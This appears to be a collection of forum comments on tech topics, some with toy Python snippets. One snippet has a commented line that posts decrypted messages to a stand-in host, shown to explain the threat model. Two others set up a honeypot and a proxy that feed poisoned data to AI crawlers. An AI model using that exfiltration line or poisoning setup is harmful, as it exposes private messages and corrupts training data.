

Same with RAM.
Unfortunately, the RAM shortage is caused by DRAM supply being diverted into specialized packages (like HBM) that can't easily be converted back into normal RAM. So even a bubble bursting won't bring that RAM onto the market.


Well if you want to read about the many battery chemistries currently in use in EVs, there’s this article:
https://insideevs.com/news/782685/all-ev-battery-chemistries-explained/
As the article explains, several chemistries have already come and gone, and the models currently being sold use a few competing chemistries, each with its own tradeoffs. Some of the up-and-coming chemistries are also already being mass produced.
So whatever it is you mean by “leap,” it sounds like it’s already been happening in the last 15-20 years.


Visa/Mastercard requires all cardholders, cardholders’ banks, merchants, and merchants’ processors to follow the comprehensive set of rules for disputed transactions. That way the dispute process tends to be uniform across different banks and across different merchant/payment processors.
The network sets the rules, while the banks implement those rules on behalf of the cardholder and the processor implements those rules on behalf of the merchant.
So replacing the network will require a comprehensive replacement for the network's dispute resolution rules (assigning who is responsible for paying when certain things happen) and procedures (how a cardholder can initiate a dispute and how that dispute gets resolved).
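Loosely illustrating what that rulebook boils down to (the reason codes and liability assignments below are hypothetical, nothing like Visa's or Mastercard's actual rules): a mapping from dispute circumstances to whichever party eats the loss, which every issuer and processor then has to implement consistently.

    # Hypothetical sketch of network-style dispute rules (made-up reason codes
    # and outcomes, not Visa's or Mastercard's actual rulebook): the network
    # defines the mapping, while the issuing bank and the merchant's processor
    # implement the workflow around it.
    from dataclasses import dataclass

    @dataclass
    class Dispute:
        reason_code: str         # e.g. "fraud_card_not_present"
        merchant_used_3ds: bool  # did the merchant use the network's auth step?
        evidence_submitted: bool # did the merchant respond with evidence?

    def liable_party(d: Dispute) -> str:
        """Return which party eats the loss under this toy rulebook."""
        if d.reason_code == "fraud_card_not_present":
            # Liability-shift style rule: using the network's authentication
            # step typically moves fraud liability from merchant to issuer.
            return "issuer" if d.merchant_used_3ds else "merchant"
        if d.reason_code == "goods_not_received":
            return "arbitration" if d.evidence_submitted else "merchant"
        return "arbitration"

    print(liable_party(Dispute("fraud_card_not_present", False, False)))  # merchant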


Or, if the app has the private key for decryption for the user to be able to see the messages, what’s stopping the app from copying that decrypted text somewhere else?
The threat model usually isn't key management; it's more about the insecure treatment of the message after decryption.
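As a toy sketch (not any real messenger's code): the app has to hold the plaintext just to display it, and at that point only the app's own behavior keeps the message from going anywhere else.

    # Toy illustration: E2E encryption protects the message in transit, but the
    # receiving app necessarily holds the plaintext to display it. Fernet here
    # stands in for whatever E2E protocol a real messenger implements.
    from cryptography.fernet import Fernet  # pip install cryptography

    key = Fernet.generate_key()                   # stands in for the user's key
    ciphertext = Fernet(key).encrypt(b"meet at 6pm")

    def show_message(token: bytes) -> None:
        plaintext = Fernet(key).decrypt(token)    # required just to render it
        print(plaintext.decode())                 # the legitimate use
        # Nothing cryptographic prevents the app from also doing something like
        # this (hypothetical endpoint); only the app's behavior and auditing do:
        # requests.post("https://analytics.example/collect", data=plaintext)

    show_message(ciphertext)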


The 90GB is RAM and NAND combined. I'm guessing most of it is actual persistent storage for all the stuff the infotainment system uses (including imagery and offline map data for GPS, which is probably a big one), rather than memory in the desktop-computing sense.


Everything else that you said seems to fit the general thesis that they’re making a lot more money selling to AI companies.
If those reasons were still true but the memory companies stood not to make as much money on those deals, I guarantee they wouldn't have taken them. They only care about money; the other reasons you list are just the mechanisms for making more of it.


It’s a very common complaint among people administering websites. This particular AI poisoning service seems to be directed at those people.
So maybe it’s not the majority of complaints about AI, but it’s a significant portion of the complaints about AI from site administrators.


The Fediverse is designed specifically to publish its data for others to use in an open manner.
Sure, and if the AI companies want to configure their crawlers to actually use APIs and ActivityPub to efficiently scrape that data, great. The problem is that there have been crawlers that do things very inefficiently (whether by malice, ignorance, or misconfiguration) and scrape the HTML of sites repeatedly, driving up hosting costs and effectively DoSing some of the sites.
If you put honeypot URLs in the mix, keep polite bots out with robots.txt, and keep humans out by hiding those links, you can serve poisoned responses only at URLs that nobody should be visiting, without worrying too much about collateral damage to legitimate visitors.
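A minimal sketch of that setup, with made-up paths and markup: disallow the trap path in robots.txt, hide the link from humans, and only poison requests that land under the trap anyway.

    # Minimal honeypot sketch (paths and markup are made up): polite bots obey
    # robots.txt, humans never see the hidden link, so only impolite crawlers
    # ever request the trap path and receive the poisoned response.
    from http.server import BaseHTTPRequestHandler, HTTPServer

    ROBOTS = b"User-agent: *\nDisallow: /trap/\n"              # keeps polite bots out
    PAGE = (b"<html><body>Normal content"
            b'<a href="/trap/a1" style="display:none">.</a>'   # hidden from humans
            b"</body></html>")
    POISON = b"<html><body>Endless generated nonsense...</body></html>"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            if self.path == "/robots.txt":
                body, ctype = ROBOTS, "text/plain"
            elif self.path.startswith("/trap/"):
                body, ctype = POISON, "text/html"   # only disobedient crawlers get here
            else:
                body, ctype = PAGE, "text/html"     # real visitors get the real site
            self.send_response(200)
            self.send_header("Content-Type", ctype)
            self.end_headers()
            self.wfile.write(body)

    if __name__ == "__main__":
        HTTPServer(("127.0.0.1", 8080), Handler).serve_forever()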


What’s crazy is that they aren’t just doing this because they make more money with AI.
No, they really are making more money by selling whole wafers rather than packaging and soldering onto DIMMs. The AI companies are throwing so much money at this that it’s just much more profitable for the memory companies to sell directly to them.


That’s why “bullshit,” as defined by Harry Frankfurt, is so useful for describing LLMs.
A lie is a false statement that the speaker knows to be false. But bullshit is a statement made by a speaker who doesn’t care if it’s true or false.


If I am reading this correctly, anyone who wants to use this service can just configure their HTTP server to sit in the middle of the request (essentially a reverse proxy), so that the crawler sees your URL but is actually being fed content fetched from the poison fountain service.
If so, that means the crawlers wouldn't be able to filter by URL, because the canonical URL of the poison fountain never appears in any request they make.
In other words, the handler is "self hosted" at your own URL, while the stream itself comes from the service's URL, which the crawler never sees.
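A minimal sketch of that kind of pass-through, assuming a hypothetical upstream endpoint at poison.example (not the real service's address): the crawler only ever sees paths on your own domain.

    # Pass-through sketch (the upstream address is a placeholder, not the real
    # service): requests to /articles/... on your site are answered with content
    # fetched from the poison service, so its canonical URL is never exposed.
    from http.server import BaseHTTPRequestHandler, HTTPServer
    from urllib.request import urlopen

    UPSTREAM = "https://poison.example/stream"   # hypothetical fountain endpoint

    class ProxyHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            if self.path.startswith("/articles/"):
                # Fetch the poison upstream; the crawler only sees your URL.
                body = urlopen(UPSTREAM, timeout=10).read()
            else:
                body = b"<html><body>Regular site content</body></html>"
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            self.wfile.write(body)

    if __name__ == "__main__":
        HTTPServer(("127.0.0.1", 8080), ProxyHandler).serve_forever()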


The hot concept around the late 2000’s and early 2010’s was crowdsourcing: leveraging the expertise of volunteers to build consensus. Quora, Stack Overflow, Reddit, and similar sites came up in that time frame where people would freely lend their expertise on a platform because that platform had a pretty good rule set for encouraging that kind of collaboration and consensus building.
Monetizing that goodwill didn’t just ruin the look and feel of the sites: it permanently altered people’s willingness to participate in those communities. Some, of course, don’t mind contributing. But many do choose to sit things out when they see the whole arrangement as enriching an undeserving middleman.


Most Android phones with always-on displays show a mostly black, grayscale screen. But iPhones introduced always-on with 1Hz panels and still show a less saturated, less bright version of the color wallpaper on the lock screen.


On phones and tablets, variable refresh rates make an "always on" display feasible within the battery budget: you can keep something like the lock screen on at all times without burning through too much power.
On laptops, this might open up possibilities like the lock screen, or some kind of static or slideshow screensaver, staying on longer while the machine is idle before the display turns off.


It’s a fancy marketing term for when AI confidently does something in error.
How can the AI be confident?
We anthropomorphize the behaviors of these technologies to analogize their outputs to other phenomena observed in humans. In many cases, the analogy helps people decide how to respond to the technology itself and to that class of error.
Describing things in terms of "hallucinations" tells users that the output shouldn't always be trusted, regardless of how "confident" the technology seems.


Apple supports its devices for a lot longer after release than most OEMs do (a minimum of 5 years after the product was last available for sale from Apple, which might come after 2 years of sales), but the impact of dropped support is much more pronounced, as you note. Apple usually declares a device obsolete 2 years after support ends, and stops selling parts and repair manuals at that point, except for batteries on a few models, which are supported to the 10-year mark. On the software/OS side, that usually means OS upgrades for 5-7 years, then 2 more years of security updates, for a total of 7-9 years of keeping a device reasonably up to date.
So if you're holding onto a 5-year-old laptop, Apple's support tends to be much better than what you'd get for a 5-year-old laptop from a Windows OEM (especially with Windows 11's upgrade requirements failing to support some devices that were still on sale at the time of Windows 11's release).
But if you've got a 10-year-old Apple laptop, it's harder to use normally than a 10-year-old Windows laptop.
Also, don't use the App Store for software on your laptop. Use a reasonable package manager like Homebrew, which doesn't have the problems you describe. Or go find a mirror that hosts old macOS packages and install them yourself.


Even the human eye basically follows the same principle. We have three types of cones, each sensitive to a different range of wavelengths, and each cone cell delivers a single-dimensional signal: the intensity of the light hitting it within its sensitivity range. Our visual cortex combines those signals from both eyes, plus the information from the color-blind rods, into a single seamless image.
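As a toy illustration of that dimensionality reduction (the bell-shaped sensitivity curves below are crude stand-ins, not real L/M/S cone data): an entire incoming spectrum collapses into just three numbers.

    # Toy sketch: collapse a full light spectrum into three cone-like responses.
    # The Gaussian sensitivity curves are crude stand-ins for real cone data.
    import numpy as np

    wavelengths = np.arange(400, 701)  # visible range, in nm

    def sensitivity(peak_nm, width_nm=40):
        """Made-up bell-shaped sensitivity curve centered on peak_nm."""
        return np.exp(-((wavelengths - peak_nm) ** 2) / (2 * width_nm ** 2))

    L, M, S = sensitivity(560), sensitivity(530), sensitivity(420)

    # An arbitrary incoming spectrum (roughly a reddish light source).
    spectrum = np.exp(-((wavelengths - 620) ** 2) / (2 * 30 ** 2))

    # Each cone type reports a single number: total stimulation across its range.
    responses = [float(np.sum(curve * spectrum)) for curve in (L, M, S)]
    print(responses)  # three scalars -- all the color information the brain gets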


This write-up is really, really good. I think about these concepts whenever people dismiss astrophotography or other computation-heavy photography as fake, software-generated images, when in reality translating the sensor data into a graphical representation for the human eye (with all the quirks of human vision, especially around brightness and color) requires conscious decisions about how the charges or voltages on a sensor should be translated into pixels in a digital file.
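Even a bare-bones raw conversion makes those decisions explicit. Here's a toy sketch (made-up calibration numbers, no demosaicing or color matrix) of turning sensor counts into displayable pixel values:

    # Toy raw-to-pixel sketch (made-up calibration values, no demosaicing):
    # every step below is a human choice about how sensor charge becomes a pixel.
    import numpy as np

    raw = np.array([[512, 2100], [9000, 15800]], dtype=float)  # fake sensor counts

    black_level = 500    # choice: what counts as "no light"
    white_level = 16000  # choice: where the sensor is considered saturated
    wb_gain = 1.4        # choice: white balance gain for this channel
    gamma = 1 / 2.2      # choice: tone curve for human brightness perception

    linear = np.clip((raw - black_level) / (white_level - black_level), 0, 1)
    balanced = np.clip(linear * wb_gain, 0, 1)
    pixels = (balanced ** gamma * 255).round().astype(np.uint8)

    print(pixels)  # same charges, but what you see depends on every choice above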


my general computing as a subscription to a server.
You say this, but I think most of us have offloaded formerly local computing to a server of some kind:
All these things used to be local uses of computing, and can now be accessed from low-powered smartphones. Things like Chromebooks give a user access to between 50-100% of what they'd be doing on a full-fledged, high-powered desktop, depending on their individual needs and use cases.


The judge controls when the jury is in the room. So the jury enters last, only after the judge orders them in. And the judge can order them out at any time to have discussions outside their presence, too.